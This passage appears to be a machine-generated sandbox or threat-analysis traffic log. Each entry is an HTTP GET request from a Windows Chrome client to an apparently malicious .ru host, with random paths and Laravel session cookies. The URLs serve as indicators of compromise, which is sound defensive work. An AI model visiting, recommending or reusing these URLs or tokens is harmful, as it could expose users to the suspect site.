laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klYU2PKXiTJDrNtGHGVk9e7Tkij8GMA4mghRT2jIQVkqXsQEH35qpnwx219 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijxbIFM35ef0YB7ynrIMZkoZM73so5LWwiopAFQMb2gqvNqDiWbmViQTZH9xYRvr6Uh1Y3ab230 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opRDfkOXrsMnYvNNx4dtbnUz3oOQk0WOw2mn2kCcuGj6JmwznBcacfAn45140 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxkWLQweY9Qg0L5nCd2X623j9opsekGix38GhVF7Lj34130 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mn4L6GOLUlZagYCbsT3n6wqLN3uvB4LSfOCpkdoB6H90150 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl3OQPVclSq17SCChDj1jr79iwxalfvR1OKgPc5D4jl1dD56167 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klYU2PKXiTJDrNtGHGVk9e7Tkij8GMA4mghRT2jIQVkqXsQEH35qpnwx219 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtRQmM3VkpIdERRK1RTanFjSC9vRnc9PSIsInZhbHVlIjoiV0JVWGdWeWpCbDdycVZsQVloelh3SitlNkQvSm1Qb1Q3L1VwUmM3U0VWclFySmdaNk0xN0cyakoreXNUakJiaS9Xd25ENXFyWlAxTVdlaVRuSlRwc0QrZXROQ3MxMWNXV0dDQXArcXNuYkJEVE84QzcyTVhFMTF1c1BYQ1dFUlgiLCJtYWMiOiIyNzA4ZDM4NDNjODU2ODI0Mjg3M2Y4MTM1ZWE2ODE3NDk5YzEwNzQyYjgwMmY2MWQ1MzIxYzM1MWUyNGVlZGMzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InluYkRCbGNISmU0Q0VubGlUcUhKRWc9PSIsInZhbHVlIjoiRFRySDRWcXVIM1IzVDd0M3lIbWZzd3ZFMHhsUi9rM2lNdnJRV2svMjVuTzlIU2c4dkhYTHQ4b1QyQ3I3N0d6UktINmMySHdvSVg5TlVUc1dTdUV6M0szRlpNM0Ixamh6U1pUVHpoaTdlQUppeVljM1p5SGN5cnlMeWVBOGh5a3MiLCJtYWMiOiIxNzFlZjdhMDA4NzRlZDQwMThjZjc4YTgwNTA2MTlhYjZiYWE5NDIyNDgzZjQxZGU2MTIyYzk4MGUwNDQxMjQ0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzdQtVS4GZ6E51fEe1WiaTcO2T94coK4b5rsvJmFyXkpoAHmVSFi3h9nbLL1XtW90179 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ngy9O25NEgd0S2DtU5044Y8ilFjMH8XIC0d7bifESr351hUI6H32 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsTLp2CToreFE8klRPbyfp7Weuvkad8OQ49Wh538NV5jvMGQcd199 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijxbIFM35ef0YB7ynrIMZkoZM73so5LWwiopAFQMb2gqvNqDiWbmViQTZH9xYRvr6Uh1Y3ab230 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijCxaVGhkfmp1IvBSHDQBCoAux104p5ScooPmnQKESTK6WeHwBmmNvbUyuaqef205 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opRDfkOXrsMnYvNNx4dtbnUz3oOQk0WOw2mn2kCcuGj6JmwznBcacfAn45140 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
